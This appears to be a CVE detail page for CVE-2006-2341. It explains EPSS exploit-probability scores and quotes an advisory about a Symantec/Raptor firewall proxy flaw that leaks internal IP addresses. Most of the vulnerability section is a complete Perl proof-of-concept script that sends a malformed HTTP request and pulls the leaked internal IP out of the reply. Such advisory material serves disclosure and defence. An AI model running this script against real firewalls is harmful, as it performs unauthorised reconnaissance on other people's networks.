CVE-2006-2341 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/17936/info Symantec Enterprise Firewall and Gateway Security products are prone to an information-disclosure weakness. The vendor has reported that the NAT/HTTP proxy component of the products may reveal the internal IP addresses of protected computers. An attacker may use this information to carry out targeted attacks against a potentially vulnerable host. #!/usr/bin/perl # [title] raptor firewall internal IP disclosure 'exploit' # [mailto] research [at] sec-consult [dot} com # # sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com # waiting for timeout (this can take about 1 min.) # behind.raptor.com: 10.238.94.67 use IO::Socket; $| = 1; $host = $ARGV[0] or die "$0 <host>\n"; $request = "getXXX/XXX HTTP/1.0\n\n"; my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', ); die "could not open socket: $!\n" unless $sock; print $sock $request; print "waiting for timeout (this can take about 1 min.)\n"; while (<$sock>) { if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) { $ip = $1; } } if (defined($ip)) { print "$host: $ip\n"; } else { print "failed.\n"; } close($sock);